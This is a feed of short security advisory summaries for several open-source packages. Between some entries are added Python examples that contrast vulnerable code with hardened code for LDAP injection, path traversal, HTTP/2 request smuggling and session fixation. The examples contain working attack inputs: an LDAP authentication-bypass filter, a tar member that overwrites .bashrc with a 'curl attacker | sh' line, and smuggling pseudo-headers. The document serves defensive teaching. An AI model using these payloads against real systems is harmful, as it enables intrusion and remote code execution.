Path resolution in hyper-staticfile didn’t correctly validate Windows paths, meaning paths like /foo/bar/c:/windows/web/screen/img101.png would be allowed and respond with the contents of c:/windows/web/screen/img101.png. Thus users could potentially r…
[capnp] Cap’n Proto and its Rust implementation vulnerable to out-of-bounds read due to logic error handling list-of-list
The Cap’n Proto library and the capnp Rust package are vulnerable to an out-of-bounds read due to a logic error in the handling of list-of-list data. If a message consumer expects data of type “list of pointers”, and if the consumer performs certain specific actions on such d…
[org.apache.camel:camel-ldap] camel-ldap component allows LDAP Injection when using the filter option
The camel-ldap component allows LDAP injection when the filter option is used. Users are recommended either to move to the Camel-Spring-Ldap component (which is not affected) or to upgrade to 3.14.6 or 3.18.4.
References
https://nvd.nist.gov/vuln/detail/CV…
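The injection above comes from splicing a user-controlled value into a filter string. The following is an added illustration, not code from Apache Camel: `build_filter_unsafe` shows the concatenation pattern, `build_filter_safe` applies the RFC 4515 escaping that any filter built from user input needs, and `filter_is_single_expression` is a cheap structural check showing how injected parentheses alter the query. All function names are hypothetical.

```python
"""Escaping untrusted values before they are spliced into an LDAP filter.

Added illustration, not code from Apache Camel: build_filter_unsafe shows the
injection pattern the advisory describes, build_filter_safe applies the
RFC 4515 escaping that any filter built from user input needs.
"""

# RFC 4515 section 3: these characters have meaning inside a filter assertion
# value and must be written as a backslash followed by two hex digits.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value: str) -> str:
    """Escape one value for use inside an LDAP filter assertion."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username: str) -> str:
    """Vulnerable: the untrusted value is interpolated verbatim, so filter
    metacharacters in it change the structure of the query."""
    return f"(&(objectClass=person)(uid={username}))"


def build_filter_safe(username: str) -> str:
    """Hardened: the value can only ever match literally."""
    return f"(&(objectClass=person)(uid={escape_ldap_filter_value(username)}))"


def filter_is_single_expression(ldap_filter: str) -> bool:
    """Structural check: a well-formed filter is exactly one parenthesised
    expression. Injected parentheses close it before the end of the string."""
    if not ldap_filter.startswith("("):
        return False
    depth = 0
    for index, ch in enumerate(ldap_filter):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
            if depth == 0 and index != len(ldap_filter) - 1:
                return False
    return depth == 0


if __name__ == "__main__":
    # Constructed attacker input: closes the uid assertion and appends an
    # always-true clause, the classic authentication-bypass payload.
    payload = "*)(uid=*))(|(uid=*"
    print(build_filter_unsafe(payload))   # structure altered
    print(build_filter_safe(payload))     # literal, harmless
```

A single `*` is the simplest test: unescaped it matches every entry, escaped (`\2a`) it matches only a literal asterisk. Escaping is the right fix for values; if the user is allowed to supply a whole filter (as with a filter option), the only safe choice is to parse and validate it against an allow-list of attributes rather than pass it through.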
[nadesiko3] nadesiko3 allows remote attacker to inject invalid value to decodeURIComponent of nako3edit
Nako3edit is the editor component of Nadeshiko 3, a programming language based on Japanese. Improper checking or handling of exceptional conditions in Nako3edit v3.3.74 and earlier allows a remote attacker to inject an invalid value into decodeURI…
[phpxmlrpc/phpxmlrpc] phpxmlrpc vulnerable to argument injection
phpxmlrpc is vulnerable to argument injection, leading to local file access, in Client::send via manipulation of the $protocol argument.
References
https://github.com/gggeek/phpxmlrpc/issues/81
https://github.com/FriendsOfPHP/security-advisories/blob/master/phpxmlrpc…
[github.com/prometheus/exporter-toolkit] Prometheus Exporter-Toolkit is vulnerable to authentication bypass
Impact
Prometheus and its exporters can be secured by a web.yml file that specifies usernames and hashed passwords for basic authentication.
Passwords are hashed with bcrypt, which means that even if you have access to the hash, it is very hard to find…
[guarddog] GuardDog vulnerable to arbitrary file write when scanning a specially-crafted PyPI package
Impact
Running GuardDog against a specially-crafted package can allow an attacker to write an arbitrary file on the machine where GuardDog is executed.
This is due to a path traversal vulnerability when extracting the .tar.gz file of the package being …
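Both this advisory and the hyper-staticfile one above come down to the same missing check: an untrusted path component (a `..` member name here, a `c:` drive segment there) is joined onto a root and allowed to resolve outside it. The following is an added example, not code from GuardDog or hyper-staticfile. `resolve_under_root` is a lexical confinement check that rejects parent references, drive-letter segments and NUL bytes regardless of host platform; `unsafe_tar_members` and `safe_extract_tar` apply it to archive member names; `make_tar` builds a constructed in-memory archive so the check can be exercised offline. All names are hypothetical.

```python
"""Confining untrusted paths to a root directory.

Added example, not code from hyper-staticfile or GuardDog. resolve_under_root
is the lexical check a static-file server needs on a request path (it covers
the drive-letter segment from the hyper-staticfile advisory); unsafe_tar_members
and safe_extract_tar apply the same check to archive member names (the
traversal case from the GuardDog advisory). All names here are hypothetical.
"""
import io
import os
import re
import tarfile

# A segment such as "c:" or "C:foo" is a Windows drive reference; on Windows,
# os.path.join discards everything before such a segment. Rejecting it on
# every platform is the conservative choice for code that may run on Windows.
_DRIVE_SEGMENT = re.compile(r"^[A-Za-z]:")


class UnsafePath(ValueError):
    """Raised when an untrusted path could resolve outside the root."""


def resolve_under_root(root: str, untrusted: str) -> str:
    """Return root joined with untrusted, or raise UnsafePath.

    The check is purely lexical, so it gives the same answer on every
    platform instead of depending on the host's path semantics.
    """
    # Windows accepts both separators; normalise before splitting.
    normalised = untrusted.replace("\\", "/")
    segments = [s for s in normalised.split("/") if s not in ("", ".")]
    for segment in segments:
        if segment == "..":
            raise UnsafePath(f"parent reference in {untrusted!r}")
        if _DRIVE_SEGMENT.match(segment):
            raise UnsafePath(f"drive-letter segment {segment!r} in {untrusted!r}")
        if "\x00" in segment:
            raise UnsafePath(f"NUL byte in {untrusted!r}")
    # A leading "/" has been dropped, so absolute request paths stay under root.
    return os.path.join(root, *segments)


def is_safe_path(root: str, untrusted: str) -> bool:
    try:
        resolve_under_root(root, untrusted)
    except UnsafePath:
        return False
    return True


def unsafe_tar_members(archive: tarfile.TarFile, dest: str) -> list:
    """Names of members that must not be extracted under dest."""
    bad = []
    for member in archive.getmembers():
        # Links can point outside dest too, so only plain files and dirs pass.
        if not (member.isfile() or member.isdir()):
            bad.append(member.name)
        elif not is_safe_path(dest, member.name):
            bad.append(member.name)
    return bad


def safe_extract_tar(archive: tarfile.TarFile, dest: str) -> None:
    """Extract only after every member has been vetted."""
    bad = unsafe_tar_members(archive, dest)
    if bad:
        raise UnsafePath(f"archive contains unsafe members: {bad}")
    for member in archive.getmembers():
        target = resolve_under_root(dest, member.name)
        if member.isdir():
            os.makedirs(target, exist_ok=True)
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with archive.extractfile(member) as src, open(target, "wb") as dst:
            dst.write(src.read())


def make_tar(members: dict) -> tarfile.TarFile:
    """Constructed in-memory .tar.gz for demonstration: name -> content."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return tarfile.open(fileobj=buf, mode="r:gz")


if __name__ == "__main__":
    print(is_safe_path("/srv/www", "/foo/bar/c:/windows/web/screen/img101.png"))
    malicious = make_tar({
        "pkg/setup.py": b"print('hello')",
        "../../home/victim/.bashrc": b"curl attacker | sh\n",
    })
    print(unsafe_tar_members(malicious, "/tmp/guarddog-scan"))
```

The check vets the whole archive before writing anything, so a crafted package cannot get a partial extraction in before the bad member is reached. Symlink and hardlink members are refused outright because a link created by an earlier member can redirect a later, lexically clean, member outside the destination.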
[github.com/mittwald/kube-httpcache] kube-httpcache is vulnerable to Cross-Site Request Forgery (CSRF)
Impact
A request forgery attack can be performed on Varnish Cache servers that have the HTTP/2 protocol turned on. An attacker may introduce characters through the HTTP/2 pseudo-headers that are invalid in the context of an HTTP/1 request line, causin…
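The attack surface here is the translation of an HTTP/2 request (a set of pseudo-headers) into an HTTP/1 request line and header block. The following is an added example, not code from kube-httpcache or Varnish. `h2_to_h1_unsafe` copies the pseudo-header values verbatim, which is the pattern the advisory describes; `h2_to_h1` first enforces the request-line grammar of RFC 9112 and the pseudo-header rules of RFC 9113 section 8.3.1. Which characters Varnish specifically mishandled is not stated above; the validation shown is the general rule. Names and the constructed attacker request are hypothetical.

```python
"""Validating HTTP/2 pseudo-headers before they become an HTTP/1 request line.

Added example, not code from kube-httpcache or Varnish. h2_to_h1_unsafe copies
the pseudo-header values verbatim; h2_to_h1 validates them first.
"""
import re

# RFC 9110 "token": what a method or header field name may consist of.
_TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# request-target and authority: visible ASCII only, so no SP, CR, LF or NUL
# can end the request line early or start a second request.
_VISIBLE_ASCII = re.compile(r"[\x21-\x7e]+")
# Field values may contain HTAB but no other control characters.
_FIELD_VALUE_FORBIDDEN = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


class MalformedRequest(ValueError):
    pass


def h2_to_h1_unsafe(pseudo: dict, headers: list) -> bytes:
    """Vulnerable translation: pseudo-header contents are not validated."""
    out = f"{pseudo[':method']} {pseudo[':path']} HTTP/1.1\r\n"
    out += f"Host: {pseudo[':authority']}\r\n"
    for name, value in headers:
        out += f"{name}: {value}\r\n"
    return (out + "\r\n").encode("latin-1")


def validate_h2_request(pseudo: dict, headers: list) -> None:
    method = pseudo.get(":method", "")
    path = pseudo.get(":path", "")
    authority = pseudo.get(":authority", "")
    # fullmatch, not match: "$" would accept a trailing newline.
    if not _TOKEN.fullmatch(method):
        raise MalformedRequest(f"bad :method {method!r}")
    if not _VISIBLE_ASCII.fullmatch(path) or not _VISIBLE_ASCII.fullmatch(authority):
        raise MalformedRequest("bad :path or :authority")
    for name, value in headers:
        # Regular headers must not be pseudo-headers, and CR/LF in a value
        # would splice a new line into the HTTP/1 message.
        if name.startswith(":") or not _TOKEN.fullmatch(name):
            raise MalformedRequest(f"bad header name {name!r}")
        if _FIELD_VALUE_FORBIDDEN.search(value):
            raise MalformedRequest(f"control character in header {name!r}")


def h2_to_h1(pseudo: dict, headers: list) -> bytes:
    """Hardened translation: validate, then build exactly as before."""
    validate_h2_request(pseudo, headers)
    return h2_to_h1_unsafe(pseudo, headers)


def is_valid_h2_request(pseudo: dict, headers: list) -> bool:
    try:
        validate_h2_request(pseudo, headers)
    except MalformedRequest:
        return False
    return True


def count_h1_requests(raw: bytes) -> int:
    """How many request lines a naive HTTP/1 parser would see in raw."""
    return raw.count(b" HTTP/1.1\r\n")


if __name__ == "__main__":
    # Constructed attacker pseudo-headers: the :method carries a complete
    # extra request, so the verbatim translation yields two HTTP/1 requests.
    smuggling = {
        ":method": "GET /healthz HTTP/1.1\r\nHost: cache\r\n\r\nPOST",
        ":path": "/admin/purge",
        ":authority": "cache.internal",
    }
    print(count_h1_requests(h2_to_h1_unsafe(smuggling, [])))   # 2
    print(is_valid_h2_request(smuggling, []))                  # False
```

The same validation should run on regular header values, since a CR/LF inside a value reaches the backend as a new header or a new request just as a bad pseudo-header does.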
[tribalsystems/zenario] Tribal Systems Zenario CMS vulnerable to Session Fixation
Tribal Systems Zenario CMS 9.3.57595 is vulnerable to session fixation. In Zenario CMS, the user session identifier (authentication token) is issued to the browser prior to authentication but is not changed after the user logs out and logs back in to the ap…
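The defence against fixation is to issue a new session identifier at every privilege change, in particular at login, and to destroy the server-side session at logout. The following is an added illustration, not Zenario code. `SessionStore` is a hypothetical in-memory session table; `login_fixation_prone` keeps the pre-authentication id, which is the weakness described above, `login_regenerating` swaps in a fresh one, and `fixation_attack` plays the attacker who plants a known id in the victim's browser and checks whether it becomes authenticated.

```python
"""Session identifier handling: fixation-prone versus regenerated on login.

Added illustration, not Zenario code. SessionStore issues a session id before
authentication, as many applications do for carts or CSRF tokens.
"""
import secrets


class SessionStore:
    """Minimal server-side session table keyed by opaque random ids."""

    def __init__(self):
        self._sessions = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def get(self, sid: str):
        return self._sessions.get(sid)

    def regenerate(self, sid: str) -> str:
        """Move the session's data under a brand-new id; the old id dies."""
        data = self._sessions.pop(sid)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = data
        return new_sid

    def logout(self, sid: str) -> None:
        """Destroy the session server-side, not just the browser cookie."""
        self._sessions.pop(sid, None)


def login_fixation_prone(store: SessionStore, sid: str, user: str) -> str:
    """Weak: authenticates whatever id the browser presented."""
    session = store.get(sid)
    if session is None:
        sid = store.new_session()
        session = store.get(sid)
    session["user"] = user
    return sid


def login_regenerating(store: SessionStore, sid: str, user: str) -> str:
    """Hardened: the privilege change gets a new id the attacker never saw."""
    if store.get(sid) is None:
        sid = store.new_session()
    new_sid = store.regenerate(sid)
    store.get(new_sid)["user"] = user
    return new_sid


def fixation_attack(store: SessionStore, login) -> bool:
    """True if the attacker's planted id ends up authenticated as the victim."""
    planted = store.new_session()          # attacker fetches a pre-auth id
    login(store, planted, "victim")        # victim logs in with the planted id
    session = store.get(planted)
    return session is not None and session["user"] == "victim"


if __name__ == "__main__":
    print(fixation_attack(SessionStore(), login_fixation_prone))  # True
    print(fixation_attack(SessionStore(), login_regenerating))    # False
```

Regeneration must also run on the login after a logout: if logout only clears the cookie while the server keeps the session, the old id is still valid and the advisory's sequence (log out, log back in, same token) still holds.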
[baserproject/basercms] baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability
There is a cross-site scripting vulnerability in the management system of baserCMS.
This vulnerability needs to be addressed when the management system is used by an unspecified number of users.
If this applies to you, please update to the new v…